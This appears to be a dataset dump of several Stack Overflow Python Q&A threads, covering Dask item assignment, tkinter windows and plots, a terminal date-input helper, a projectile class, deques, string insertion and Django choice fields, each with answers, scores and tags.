Q: Cannot assign int in Dask array I'm having trouble doing a simple operation: assigning a value to a dask array. I get the error: "Item assignment with <class 'int'> not supported" Does anybody know why ? This should normally be doable according to the dask documentation... Here's the (elementary) "chunk" of code that I'm having trouble with. Problem occurs because of the line "x[0] = 1.0" import dask.array as da x = da.zeros(10) x[0] = 1.0 If you read this message and know how to help me that'd be really nice ! :) A: Works for me - so this is probably an issue with the version of Dask that you are using. $ python Python 3.10.8 (main, Nov 24 2022, 14:13:03) [GCC 11.2.0] on linux Type "help", "copyright", "credits" or "license" for more information. >>> import dask >>> import dask.array as da >>> x = da.zeros(10) >>> x[0] = 1.0 >>> x.compute() array([1., 0., 0., 0., 0., 0., 0., 0., 0., 0.]) >>> dask.__version__ '2022.7.0'
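A note worth appending for anyone still seeing the message: support for item assignment only landed in later Dask releases, so checking the installed version is the quickest diagnostic (the working session above reports 2022.7.0), and pip install --upgrade dask is the usual remedy. A minimal check:

import dask

# Item assignment (x[0] = 1.0) requires a reasonably recent release;
# old versions raise "Item assignment ... not supported".
print(dask.__version__)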
Cannot assign int in Dask array
I'm having trouble doing a simple operation: assigning a value to a dask array. I get the error: "Item assignment with <class 'int'> not supported" Does anybody know why ? This should normally be doable according to the dask documentation... Here's the (elementary) "chunk" of code that I'm having trouble with. Problem occurs because of the line "x[0] = 1.0" import dask.array as da x = da.zeros(10) x[0] = 1.0 If you read this message and know how to help me that'd be really nice ! :)
[ "Works for me - so this is probably an issue with the version of Dask that you are using.\n$ python\nPython 3.10.8 (main, Nov 24 2022, 14:13:03) [GCC 11.2.0] on linux\nType \"help\", \"copyright\", \"credits\" or \"license\" for more information.\n>>> import dask\n>>> import dask.array as da\n>>> x = da.zeros(10)\n>>> x[0] = 1.0\n>>> x.compute()\narray([1., 0., 0., 0., 0., 0., 0., 0., 0., 0.])\n>>> dask.__version__\n'2022.7.0'\n\n" ]
[ 0 ]
[]
[]
[ "arrays", "assign", "dask", "python" ]
stackoverflow_0074592681_arrays_assign_dask_python.txt
Q: INPUT FORMAT COMPLIANCE: a date prompt with 3 mutable input fields separated by 2 static forward slashes, with set ranges for each feild I am trying to create a prompt that is either separated by hard slashes or slashes appear after specified input range, all on a single line. i want: Enter your age (M/D/Y): int / int / int #where the slashes are fixed and part of the prompt not: M: D: Y: example: Enter the date M/D/Y: '12'**/**'12'**/**'1234' 0,1,/ 0,1,/ Ideal: the slashes are static but the input fields between are mutable, and cursor skips slashes. **or:**the slash appears after populating the specified range...and the integer input field ranges would be set at 0:1,0:1,0:3 (mm) if users enters two integers, backslash appears (dd) if users enters two integers, backslash appears (yyyy) user completes the range (or not) User is unable to enter subsequent integers out of range. nothing seemed to be what I'm after. the closest info i could find was using datetime but that just sorts out the input, i want actual hard slashes to appear, separating the input fields, or appear after input and stay. printing it like that isn't an issue, and the integer input field ranges would be set at 0:1,0:1,0:3 being a noob i'm not certain if py is even capable of such a demand. A: #A solution was provided elsewhere, posting with Author's permission. """PINPUT, AN INPUT FORMAT COMPLIANCE MODULE FOR DATE/TIME ENTRY""" " AUTHOR: INDRAJIT MAJUMDAR " import sys   try: #for windows platform. from msvcrt import getwch as getch except ImportError: #for linux, darwin (osx), and other unix distros. def getch(): """ Gets a single character from STDIO. """ import sys import tty import termios fd = sys.stdin.fileno() old = termios.tcgetattr(fd) try: tty.setraw(fd) return sys.stdin.read(1) finally: termios.tcsetattr(fd, termios.TCSADRAIN, old)   def flsp_input(prmt, ptrn, otyp="t"): #otyp=[s=string, t=tuple, p=ptrn] """ --flsp_input: --Fixed Length Slotted Pattern Input [int, str]-- Licence: opensource Version: 1.1 Author : indramobj2@gmail.com """ def fout(ts, ptrn, otyp): fs, tpl = 0, [] for i, p in enumerate(ptrn): if p[2] == "": csd = ts[fs:] else: fi = ts[fs:].find(p[2]) if fi == -1: csd = ts[fs:] else: csd = ts[fs:fs+fi] fs += p[1]+len(p[2]) if otyp == "s": out = ts if otyp == "t": tpl.append(csd) if otyp == "p": ptrn[i].append(csd) if otyp == "s": out = fout if otyp == "t": out = tuple(tpl) if otyp == "p": out = ptrn return out i, ts, plts, = 0, "", 0 ptxt = "".join([f"{'_'*e[1]}{e[2]}" for e in ptrn]) print(f"{prmt}{ptxt}\r{prmt}", end="") sys.stdout.flush() while i < len(ptrn): ptype, plen, psep = ptrn[i] while True: cc = getch() if ord(cc) == 127: #bksp frm = 0 if i == 0 else ts.rfind(ptrn[i-1][2])+1 cplf = ts[frm:] bkstp = 2 if cplf == "" and i != 0 else 1 ts = ts[:len(ts)-bkstp] if bkstp == 2: i -= 1 ptype, plen, psep = ptrn[i] plts = sum((ptrn[j][1]+len(ptrn[j][2]) for j in range(i))) print(f"\r{prmt}{ptxt}\r{prmt}{ts}", end="") continue if ord(cc) == 13: #enter print() return fout(ts, ptrn, otyp) try: cc = int(cc) except ValueError: cc = cc if type(cc) is ptype: cc = str(cc) ts += cc print(cc, end="") sys.stdout.flush() if len(ts) - plts == plen: print(psep, end="") ts += psep plts = len(ts) sys.stdout.flush() break i += 1 print() return fout(ts, ptrn, otyp)   if __name__ == "__main__": prmt = "Input Date and Time: " ptrn = [[int, 2, "/"], [int, 2, "/"], [int, 4, " "], [int, 2, ":"], [int, 2, ":"], [int, 2, "."], [int, 3, " "], [str, 2, ""]] #ptrn = [[str, 2, ":"], [int, 2, " "], [str, 1, " "], # [int, 4, 
""]] ts = pinput(prmt, ptrn) print(f"{ts=}")
INPUT FORMAT COMPLIANCE: a date prompt with 3 mutable input fields separated by 2 static forward slashes, with set ranges for each field
I am trying to create a prompt where the fields are either separated by hard slashes, or where slashes appear after a specified input range, all on a single line.
I want:
Enter the date (M/D/Y): int / int / int  # where the slashes are fixed and part of the prompt
not:
M:
D:
Y:
Example:
Enter the date M/D/Y: '12'/'12'/'1234'
0,1,/ 0,1,/
Ideal: the slashes are static but the input fields between them are mutable, and the cursor skips the slashes.
Or: the slash appears after the specified range is populated, and the integer input field ranges would be set at 0:1, 0:1, 0:3 (i.e. two, two, and four digits):
(mm) when the user enters two integers, a slash appears
(dd) when the user enters two integers, a slash appears
(yyyy) the user completes the range (or not)
The user is unable to enter further integers beyond the range.
Nothing I found seemed to be what I'm after. The closest thing I could find was datetime, but that just sorts out the input; I want actual hard slashes to appear, separating the input fields, or to appear after input and stay. Printing it like that isn't an issue. Being a noob, I'm not certain Python is even capable of such a demand.
[ "#A solution was provided elsewhere, posting with Author's permission.\n\n\"\"\"PINPUT, AN INPUT FORMAT COMPLIANCE MODULE FOR DATE/TIME ENTRY\"\"\"\n\" AUTHOR: INDRAJIT MAJUMDAR \"\n\n import sys\n \ntry:\n #for windows platform.\n from msvcrt import getwch as getch\nexcept ImportError:\n #for linux, darwin (osx), and other unix distros.\n def getch():\n \"\"\"\n Gets a single character from STDIO.\n \"\"\"\n import sys\n import tty\n import termios\n fd = sys.stdin.fileno()\n old = termios.tcgetattr(fd)\n try:\n tty.setraw(fd)\n return sys.stdin.read(1)\n finally:\n termios.tcsetattr(fd, termios.TCSADRAIN, old)\n \ndef flsp_input(prmt, ptrn, otyp=\"t\"): #otyp=[s=string, t=tuple, p=ptrn]\n \"\"\"\n --flsp_input:\n --Fixed Length Slotted Pattern Input [int, str]--\n Licence: opensource\n Version: 1.1\n Author : indramobj2@gmail.com\n \"\"\"\n def fout(ts, ptrn, otyp):\n fs, tpl = 0, []\n for i, p in enumerate(ptrn):\n if p[2] == \"\":\n csd = ts[fs:]\n else:\n fi = ts[fs:].find(p[2])\n if fi == -1:\n csd = ts[fs:]\n else:\n csd = ts[fs:fs+fi]\n fs += p[1]+len(p[2])\n if otyp == \"s\": out = ts\n if otyp == \"t\": tpl.append(csd)\n if otyp == \"p\": ptrn[i].append(csd)\n if otyp == \"s\": out = fout\n if otyp == \"t\": out = tuple(tpl)\n if otyp == \"p\": out = ptrn\n return out\n \n i, ts, plts, = 0, \"\", 0\n ptxt = \"\".join([f\"{'_'*e[1]}{e[2]}\" for e in ptrn])\n print(f\"{prmt}{ptxt}\\r{prmt}\", end=\"\")\n sys.stdout.flush()\n while i < len(ptrn):\n ptype, plen, psep = ptrn[i]\n while True:\n cc = getch()\n if ord(cc) == 127: #bksp\n frm = 0 if i == 0 else ts.rfind(ptrn[i-1][2])+1\n cplf = ts[frm:]\n bkstp = 2 if cplf == \"\" and i != 0 else 1\n ts = ts[:len(ts)-bkstp]\n if bkstp == 2: i -= 1\n ptype, plen, psep = ptrn[i]\n plts = sum((ptrn[j][1]+len(ptrn[j][2]) for j in range(i)))\n print(f\"\\r{prmt}{ptxt}\\r{prmt}{ts}\", end=\"\")\n continue\n if ord(cc) == 13: #enter\n print()\n return fout(ts, ptrn, otyp)\n try:\n cc = int(cc)\n except ValueError:\n cc = cc\n if type(cc) is ptype:\n cc = str(cc)\n ts += cc\n print(cc, end=\"\")\n sys.stdout.flush()\n if len(ts) - plts == plen:\n print(psep, end=\"\")\n ts += psep\n plts = len(ts)\n sys.stdout.flush()\n break\n i += 1\n print()\n return fout(ts, ptrn, otyp)\n \nif __name__ == \"__main__\":\n prmt = \"Input Date and Time: \"\n ptrn = [[int, 2, \"/\"], [int, 2, \"/\"], [int, 4, \" \"],\n [int, 2, \":\"], [int, 2, \":\"], [int, 2, \".\"],\n [int, 3, \" \"], [str, 2, \"\"]]\n #ptrn = [[str, 2, \":\"], [int, 2, \" \"], [str, 1, \" \"],\n # [int, 4, \"\"]]\n ts = pinput(prmt, ptrn)\n print(f\"{ts=}\")\n\n" ]
[ 0 ]
[]
[]
[ "datetime", "input", "python" ]
stackoverflow_0074506956_datetime_input_python.txt
Q: Does the results indicate that the list(position) is not updated or there is something wrong with the equation? I am writing a code to update a position of a ball after it being kicked at a given angle and velocity after a certain time passed. Does the results indicate that the list(position) is not updated or there is something wrong with the equation? import numpy as np class Ball(): def __init__(self, theta, v): self.position = [0, 0] # Position at ground is (0,0) self.theta = 0 self.v = 0 def step(self, delta_t = .1): ball.position[0] = ball.v*np.cos(ball.theta)*t ball.position[1] = (ball.v**2*np.sin(ball.theta))/9.81 return ball.position ball = Ball(theta = 30, v = 100) for t in range(200): ball.step(delta_t = 0.05) print(f'Ball is at x={ball.position[0]:.2f}m, y={ball.position[1]:.2f}m') # Check position Output = Ball is at x=0.00m, y=0.00m A: There were a few bugs in your code, I've altered it to do what I believe you intend it to do below: import numpy as np class Ball(): def __init__(self, theta, v): self.position = [0, 0] # Position at ground is (0,0) self.theta = theta self.v = v def step(self, delta_t = .1): self.position[0] = self.v*np.cos(self.theta)*delta_t self.position[1] = (self.v**2*np.sin(self.theta))/9.81 return self.position ball = Ball(theta = 30, v = 100) for t in range(200): ball.step(delta_t = 0.05) print(f'Ball is at x={ball.position[0]:.2f}m, y={ball.position[1]:.2f}m') # Check position With the result: Ball is at x=0.77m, y=-1007.17m Explanation First, your __init__ method simply set self.theta and self.v to 0, instead of setting them equal to the values provided when initialising the ball object. Second, your step method relied upon something called t, instead of delta_t which is what you actually rely upon in your defintion of step. Finally, in your step method, you seem to be relying on ball.XYZ instead of self.XYZ. Correcting all of these, I believe, makes the class function as you wish it to - whether the calculation is correct, I'll leave to you to determine. Note If what you're trying to do is plot the trajectory of a ball in free fall, you should probably update self.v and self.theta with every call of self.step(). Currently, self.step() returns where the ball will be after a given interval of time from its initial condition. If you're trying to step incrementally - with every call of self.step(), the current self.v and current self.theta of the ball will be different after every call of self.step() - but your self.step() definition currently takes no account of this.
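Building on the answer's closing note (which leaves the kinematics to the reader): the posted y-equation is not a position formula. The standard projectile equations give position from elapsed time, so a step method usually needs to accumulate time across calls. A hedged sketch; it assumes self.t is initialised to 0 in __init__ and that theta is given in degrees:

import numpy as np

def step(self, delta_t=0.1):
    self.t += delta_t                      # accumulate elapsed time
    rad = np.radians(self.theta)           # degrees -> radians for np.cos/np.sin
    self.position[0] = self.v * np.cos(rad) * self.t
    self.position[1] = self.v * np.sin(rad) * self.t - 0.5 * 9.81 * self.t ** 2
    return self.position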
Do the results indicate that the list (position) is not updated, or is there something wrong with the equation?
I am writing code to update the position of a ball after it is kicked at a given angle and velocity, once a certain time has passed. Do the results indicate that the list (position) is not updated, or is there something wrong with the equation?
import numpy as np

class Ball():
    def __init__(self, theta, v):
        self.position = [0, 0] # Position at ground is (0,0)
        self.theta = 0
        self.v = 0
    
    def step(self, delta_t = .1):
        ball.position[0] = ball.v*np.cos(ball.theta)*t
        ball.position[1] = (ball.v**2*np.sin(ball.theta))/9.81
        return ball.position
    
    
    
ball = Ball(theta = 30, v = 100)

for t in range(200):
    ball.step(delta_t = 0.05)

print(f'Ball is at x={ball.position[0]:.2f}m, y={ball.position[1]:.2f}m') # Check position

Output = Ball is at x=0.00m, y=0.00m
[ "There were a few bugs in your code, I've altered it to do what I believe you intend it to do below:\nimport numpy as np\n\nclass Ball():\n def __init__(self, theta, v):\n self.position = [0, 0] # Position at ground is (0,0)\n self.theta = theta\n self.v = v\n \n def step(self, delta_t = .1):\n self.position[0] = self.v*np.cos(self.theta)*delta_t\n self.position[1] = (self.v**2*np.sin(self.theta))/9.81\n return self.position\n \n \n \nball = Ball(theta = 30, v = 100)\n\nfor t in range(200):\n ball.step(delta_t = 0.05)\n\nprint(f'Ball is at x={ball.position[0]:.2f}m, y={ball.position[1]:.2f}m') # Check position\n\nWith the result:\nBall is at x=0.77m, y=-1007.17m\n\nExplanation\nFirst, your __init__ method simply set self.theta and self.v to 0, instead of setting them equal to the values provided when initialising the ball object.\nSecond, your step method relied upon something called t, instead of delta_t which is what you actually rely upon in your defintion of step.\nFinally, in your step method, you seem to be relying on ball.XYZ instead of self.XYZ.\nCorrecting all of these, I believe, makes the class function as you wish it to - whether the calculation is correct, I'll leave to you to determine.\nNote\nIf what you're trying to do is plot the trajectory of a ball in free fall, you should probably update self.v and self.theta with every call of self.step(). Currently, self.step() returns where the ball will be after a given interval of time from its initial condition. If you're trying to step incrementally - with every call of self.step(), the current self.v and current self.theta of the ball will be different after every call of self.step() - but your self.step() definition currently takes no account of this.\n" ]
[ 0 ]
[]
[]
[ "python" ]
stackoverflow_0074592731_python.txt
Q: Tkinter python not terminating the program
import tkinter

global win1,win2, win3

def win1_open():
    global win1
    win1 = tkinter.Tk()
    win1.geometry('500x500')
    button_next = tkinter.Button(win1, text='Next', width=8, command=win2_open)
    button_next.place(x=100 * 2 + 80, y = 100)
    win1.mainloop()

def win2_open():
    global win2
    win2 = tkinter.Tk()
    win2.geometry('500x500')
    button_next = tkinter.Button(win2, text='Next', width=8, command=win3_open)
    button_next.place(x=100 * 2 + 80, y=100)
    win2.mainloop()

def win3_open():
    global win3
    win3 = tkinter.Tk()
    win3.geometry('500x500')
    button_exit = tkinter.Button(win3, text='Exit', width=8, command=exit_program)
    button_exit.place(x=100 * 2 + 80, y=100)
    win3.mainloop()

def exit_program():
    global win1, win2, win3
    win1.quit()
    win2.quit()
    win3.quit()

win1_open()

The third window has an Exit button that I use to terminate the program. It terminates the program, but only after I click the Exit button three times. How can I terminate the program with one button click?
A: Instead of using quit(), you should use destroy():
def exit_program():
    global win1, win2, win3
    win1.destroy()
    win2.destroy()
    win3.destroy()
To learn more about the difference between these two functions, you can refer to this: How do I close a tkinter Window?
A: Change the calls in exit_program() to .destroy() instead of .quit(). Also, it's not necessary to have more than one .mainloop() in your Tkinter program. One mainloop suffices.
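One point worth adding to both answers: each call to tkinter.Tk() creates a separate Tcl interpreter with its own event loop, which is one reason the program needs several clicks to unwind. The conventional structure uses a single root plus Toplevel children and a single mainloop; a minimal sketch:

import tkinter

root = tkinter.Tk()               # the one and only root/interpreter
win2 = tkinter.Toplevel(root)
win3 = tkinter.Toplevel(root)

# Destroying the root also destroys all Toplevel children.
tkinter.Button(win3, text='Exit', width=8, command=root.destroy).pack()

root.mainloop()                   # a single event loop serves every window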
Tkinter python not terminating the program
import tkinter global win1,win2, win3 def win1_open(): global win1 win1 = tkinter.Tk() win1.geometry('500x500') button_next = tkinter.Button(win1, text='Next', width=8, command=win2_open) button_next.place(x=100 * 2 + 80, y = 100) win1.mainloop() def win2_open(): global win2 win2 = tkinter.Tk() win2.geometry('500x500') button_next = tkinter.Button(win2, text='Next', width=8, command=win3_open) button_next.place(x=100 * 2 + 80, y=100) win2.mainloop() def win3_open(): global win3 win3 = tkinter.Tk() win3.geometry('500x500') button_exit = tkinter.Button(win3, text='Exit', width=8, command=exit_program) button_exit.place(x=100 * 2 + 80, y=100) win3.mainloop() def exit_program(): global win1, win2, win3 win1.quit() win2.quit() win3.quit() win1_open() The third window has Exit button that I have used to terminate the program. It terminates the program but only after I click Exit button thrice. How to terminate the program on one button click?
[ "Instead of using quit(), you should use destory()\ndef exit_program():\n global win1, win2, win3\n win1.destroy()\n win2.destroy()\n win3.destroy()\n\nTo learn more about the difference between these 2 function, you can refer to this:\nHow do I close a tkinter Window?\n", "Change the calls in exit_program() to .destroy() instead of .quit()\nAlso, it's not necessary to have more than one .mainloop() in your Tkinter program. One mainloop suffices.\n" ]
[ 1, 0 ]
[]
[]
[ "python", "tkinter", "user_interface" ]
stackoverflow_0074588453_python_tkinter_user_interface.txt
Q: Deque to keep last few minutes in Python I'd like to keep the last 10 minutes of a time series in memory with some sort of deque system in Python. Right now I'm using deque but I may receive 100 data points in few seconds and then nothing for few seconds. Any idea ? I read something about FastRBTree in a post but it dated back to 2014. Is there any better solution now? I am mostly interested in computing the standard deviation over a fixed period of time, So the less data I receive within that fixed period of time, the less the standard deviation will be A: If you are concerned about container size, "simplest" thing might be to use the deque and just set a maxlen argument and then as it overflows, the oldest adds are just lost, but that does not guarantee 10 minutes worth obviously. But it is an efficient data structure for this. If you want to "trim by time in deque" then you probably need to create a custom class that can hold the data and a timestamp of some kind and then periodically poll the end of the deque for the time of the earliest item and keep popping until you are no later than current time + 10 mins. If things are happening more dynamically, you might use some kind of database structure to do this (not my area of expertise, but seems plausible path to pursue) and possible re-ask a similar question (with some more details) as a database or sqlite question.
Deque to keep last few minutes in Python
I'd like to keep the last 10 minutes of a time series in memory with some sort of deque system in Python. Right now I'm using deque but I may receive 100 data points in few seconds and then nothing for few seconds. Any idea ? I read something about FastRBTree in a post but it dated back to 2014. Is there any better solution now? I am mostly interested in computing the standard deviation over a fixed period of time, So the less data I receive within that fixed period of time, the less the standard deviation will be
[ "If you are concerned about container size, \"simplest\" thing might be to use the deque and just set a maxlen argument and then as it overflows, the oldest adds are just lost, but that does not guarantee 10 minutes worth obviously. But it is an efficient data structure for this.\nIf you want to \"trim by time in deque\" then you probably need to create a custom class that can hold the data and a timestamp of some kind and then periodically poll the end of the deque for the time of the earliest item and keep popping until you are no later than current time + 10 mins.\nIf things are happening more dynamically, you might use some kind of database structure to do this (not my area of expertise, but seems plausible path to pursue) and possible re-ask a similar question (with some more details) as a database or sqlite question.\n" ]
[ 0 ]
[]
[]
[ "deque", "python", "python_3.x" ]
stackoverflow_0074585486_deque_python_python_3.x.txt
Q: How to insert every nth charts in string? PYTHON I have a code, but I don't really know python, so I have a problem. I know that the insert isn't right for strings but I don't know how can I insert? original_string = input("What's yout sentence?") add_character = input("What char do you want to add?") slice = int(input("What's the step?")) for i in original_string[::slice]: original_string.insert(add_character) print("The string after inserting characters: " + str(original_string)) So I need help, how can I rewrite this? That's the homework for university and we haven't studied def so I can't use it A: Also I try to use .join, but now it prints original string, how can I print the string with joined chars? original_string = input("What's yout sentence?") add_character = input("What char do you want to add?") slice = int(input("What's the step?")) for i in original_string[::slice]: original_string.join(add_character) print("The string after inserting characters: " + str(original_string)) A: original_string = input("What's yout sentence?") add_character = input("What char do you want to add?") slice = int(input("What's the step?")) new_string = "" for index, letter in enumerate(original_string): if index % slice == 0 and index != 0: new_string += add_character + letter else: new_string += letter print("The string after inserting characters: " + str(new_string)) Explanation: Strings are immutable so we'll have to create a new string to append to. So loop through the original string, take each letter and its index. If the index is a multiple of the slice, then add the character in add_character variable along with the letter, otherwise only append the letter. This will add the character at every multiple of the slice. I believe this is what the code was trying to achieve atleast, correct me if I'm wrong
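A compact alternative worth appending, since strings are immutable and neither .insert nor .join on the original string can work the way the question attempts. This sketch needs no def, only slicing and str.join; the sample values are illustrative:

original_string = "abcdefgh"
add_character = "-"
step = 2

# Cut the string into step-sized chunks, then glue them back together
# with the chosen character between the chunks.
chunks = [original_string[i:i + step] for i in range(0, len(original_string), step)]
print(add_character.join(chunks))  # ab-cd-ef-gh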
How to insert every nth chars in string? PYTHON
I have a code, but I don't really know python, so I have a problem. I know that the insert isn't right for strings but I don't know how can I insert? original_string = input("What's yout sentence?") add_character = input("What char do you want to add?") slice = int(input("What's the step?")) for i in original_string[::slice]: original_string.insert(add_character) print("The string after inserting characters: " + str(original_string)) So I need help, how can I rewrite this? That's the homework for university and we haven't studied def so I can't use it
[ "Also I try to use .join, but now it prints original string, how can I print the string with joined chars?\n original_string = input(\"What's yout sentence?\")\n add_character = input(\"What char do you want to add?\")\n slice = int(input(\"What's the step?\"))\n \n for i in original_string[::slice]:\n original_string.join(add_character)\n \n\nprint(\"The string after inserting characters: \" + str(original_string))\n\n", "original_string = input(\"What's yout sentence?\")\nadd_character = input(\"What char do you want to add?\")\nslice = int(input(\"What's the step?\"))\n\nnew_string = \"\"\n\nfor index, letter in enumerate(original_string):\n if index % slice == 0 and index != 0:\n new_string += add_character + letter\n else:\n new_string += letter\n\nprint(\"The string after inserting characters: \" + str(new_string))\n\nExplanation: Strings are immutable so we'll have to create a new string to append to. So loop through the original string, take each letter and its index. If the index is a multiple of the slice, then add the character in add_character variable along with the letter, otherwise only append the letter. This will add the character at every multiple of the slice. I believe this is what the code was trying to achieve atleast, correct me if I'm wrong\n" ]
[ 0, 0 ]
[]
[]
[ "insert", "python", "string" ]
stackoverflow_0074592740_insert_python_string.txt
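As a cross-check of the accepted loop above, the same insert-every-nth behaviour can be obtained by joining fixed-size slices; the sample values below are made up for illustration:

original_string = "abcdefgh"
add_character = "-"
step = 3

# joining chunks of `step` characters puts the separator before every
# index that is a non-zero multiple of `step`, matching the loop above
result = add_character.join(
    original_string[i:i + step] for i in range(0, len(original_string), step)
)
print(result)  # abc-def-gh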
Q: using django, i want to show the user options to pick from with 'select' and a TextChoices model in my html template i have a select box where the user chooses the desired size of clothing like this <select> <option> Small </option> <option> Medium </option> <option> Large </option> </select> i want to display the options for the user to see. because i want to save the input in the database, to grab it, i was thinking of doing this: models.py class Product(models.Model): ... class Size(models.TextChoices): SMALL = 'S' MEDIUM = 'M' LARGE = 'L' size = models.CharField(max_length=3, choices=Size.choices, default=Size.LARGE) html <select> {% for size in product.size %} <option value="" name="{{ size }}"> {{ size }} </option> {% endfor %} </select> views.py def product(request, slug): product = get_object_or_404(Product, slug=slug) return render(request, 'product/product.html', {'product': product}) but i only get to display one value, which is the default value LARGE in my admin page, the 'Sizes' dropdown select for the product is showing perfectly with all 3 different values for the admin to pick did i choose the wrong method with 'TextChoices'? the html is not correct? am i missing something in views.py? all of the above? A: So... i found a way to do it... using django forms from django import forms from .models import Product class ClothingForm(forms.ModelForm): class Meta: model = Product fields = ['size'] views.py from .forms import ClothingForm def product(request, slug): product = get_object_or_404(Product, slug=slug) sizesForm = ClothingForm() return render(request, 'product/product.html', {'product': product, 'sizesForm': sizesForm}) html {{ sizesForm }} damn im dumb
using django, i want to show the user options to pick from with 'select' and a TextChoices model
in my html template i have a select box where the user chooses the desired size of clothing like this <select> <option> Small </option> <option> Medium </option> <option> Large </option> </select> i want to display the options for the user to see. because i want to save the input in the database, to grab it, i was thinking of doing this: models.py class Product(models.Model): ... class Size(models.TextChoices): SMALL = 'S' MEDIUM = 'M' LARGE = 'L' size = models.CharField(max_length=3, choices=Size.choices, default=Size.LARGE) html <select> {% for size in product.size %} <option value="" name="{{ size }}"> {{ size }} </option> {% endfor %} </select> views.py def product(request, slug): product = get_object_or_404(Product, slug=slug) return render(request, 'product/product.html', {'product': product}) but i only get to display one value, which is the default value LARGE in my admin page, the 'Sizes' dropdown select for the product is showing perfectly with all 3 different values for the admin to pick did i choose the wrong method with 'TextChoices'? the html is not correct? am i missing something in views.py? all of the above?
[ "So... i found a way to do it...\nusing django forms\nfrom django import forms\nfrom .models import Product\n\nclass ClothingForm(forms.ModelForm):\n class Meta:\n model = Product\n fields = ['size']\n\nviews.py\nfrom .forms import ClothingForm\n\ndef product(request, slug):\n product = get_object_or_404(Product, slug=slug)\n sizesForm = ClothingForm()\n return render(request, 'product/product.html', {'product': product, 'sizesForm': sizesForm})\n\nhtml\n{{ sizesForm }}\n\ndamn im dumb\n" ]
[ 0 ]
[]
[]
[ "django", "django_models", "django_views", "python", "user_interface" ]
stackoverflow_0074587095_django_django_models_django_views_python_user_interface.txt
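If a ModelForm feels too heavy, Django's TextChoices also exposes a .choices list of (value, label) pairs that can be handed to the template directly; this is a sketch reusing the question's names, not code from the original answer:

# views.py
from django.shortcuts import get_object_or_404, render
from .models import Product

def product(request, slug):
    product = get_object_or_404(Product, slug=slug)
    # Product.Size.choices is [('S', 'Small'), ('M', 'Medium'), ('L', 'Large')]
    return render(request, 'product/product.html',
                  {'product': product, 'sizes': Product.Size.choices})

and in product.html:

<select name="size">
  {% for value, label in sizes %}
    <option value="{{ value }}" {% if product.size == value %}selected{% endif %}>{{ label }}</option>
  {% endfor %}
</select>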
Q: Tkinter Button behaviour after matplotlib plt.show() I am writing a python tkinter-based GUI that should show Matplotlib-Plots in new Windows whenever I hit a button. Plots shall be non-exclusive, I want to be able to bring up as many Plots as I would like. (Original App has more than one button, I shortened it below) The Problem is: When I click one of my buttons the plot appears correctly. When I close the plot again the behaviour of the used button becomes spooky: at MacOS it appears pushed on Mouse-over at Windows it stays pushed for the rest of runtime On both OS'es it keeps working perfectly fine though. Only the graphics of the button are weird after first usage. I believe it has something to do with the running plt.show() blocking the GUI framework somehow, but I can not nail it down. class Simulator: def __init__(self) -> None: self.startGUI() def startGUI(self): self.window = tk.Tk() frmCol2 = tk.Frame(pady=10, padx=10) self.btnDraw = tk.Button(master = frmCol2, text="Draw Something", width=20) self.btnDraw.grid(row = 1, column = 1) self.btnDraw.bind("<Button-1>", self.drawSth) frmCol2.grid(row=1, column=2, sticky="N") self.window.mainloop() def drawSth(self, event): if self.btnDraw["state"] != "disabled": self.visualizer.plotSth(self.scenario) Plotting itself is then done by the object visualizer of the following class: class RadarVisualizer: def plotClutterVelocities(self, scenario): scArray = np.array(scenario) plt.figure() plt.plot(scArray[:,0], scArray[:,1]) plt.title("Some Title") plt.grid() plt.show() I checked the MPL Backend: It is TkAGG. I furthermore tried to put the plotting in a different thread which makes python crying a lot. It seems to expect the plots to be started in the same Thread. Maybe because the backend I am using is also Tkinter based. A: An example with many windows without plt.show(). Sample taken from here. import tkinter as tk import pandas as pd import matplotlib.pyplot as plt from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg i = 0 new_windows = [] data1 = {'country': ['A', 'B', 'C', 'D', 'E'], 'gdp_per_capita': [45000, 42000, 52000, 49000, 47000] } df1 = pd.DataFrame(data1) data2 = {'year': [1920, 1930, 1940, 1950, 1960, 1970, 1980, 1990, 2000, 2010], 'unemployment_rate': [9.8, 12, 8, 7.2, 6.9, 7, 6.5, 6.2, 5.5, 6.3] } df2 = pd.DataFrame(data2) data3 = {'interest_rate': [5, 5.5, 6, 5.5, 5.25, 6.5, 7, 8, 7.5, 8.5], 'index_price': [1500, 1520, 1525, 1523, 1515, 1540, 1545, 1560, 1555, 1565] } df3 = pd.DataFrame(data3) def f_1(win): global df1 figure1 = plt.Figure(figsize=(6, 5), dpi=100) ax1 = figure1.add_subplot(111) bar1 = FigureCanvasTkAgg(figure1, win) bar1.get_tk_widget().pack(side=tk.LEFT, fill=tk.BOTH) df = df1[['country', 'gdp_per_capita']].groupby('country').sum() df.plot(kind='bar', legend=True, ax=ax1) ax1.set_title('Country Vs. GDP Per Capita') def f_2(win): global df2 figure2 = plt.Figure(figsize=(5, 4), dpi=100) ax2 = figure2.add_subplot(111) line2 = FigureCanvasTkAgg(figure2, win) line2.get_tk_widget().pack(side=tk.LEFT, fill=tk.BOTH) df = df2[['year', 'unemployment_rate']].groupby('year').sum() df.plot(kind='line', legend=True, ax=ax2, color='r', marker='o', fontsize=10) ax2.set_title('Year Vs. Unemployment Rate') def f_3(win): global df3 figure3 = plt.Figure(figsize=(5, 4), dpi=100) ax3 = figure3.add_subplot(111) ax3.scatter(df3['interest_rate'], df3['index_price'], color='g') scatter3 = FigureCanvasTkAgg(figure3, win) scatter3.get_tk_widget().pack(side=tk.LEFT, fill=tk.BOTH) ax3.legend(['index_price']) ax3.set_xlabel('Interest Rate') ax3.set_title('Interest Rate Vs. Index Price') def new_window(): global i new = tk.Toplevel(root) if i == 0: f_1(new) if i == 1: f_2(new) if i == 2: f_3(new) new_windows.append(new) i += 1 if i > 2: i = 0 root = tk.Tk() tk.Button(root, text='new_window', command=new_window).pack() root.mainloop()
Tkinter Button behaviour after matplotlib plt.show()
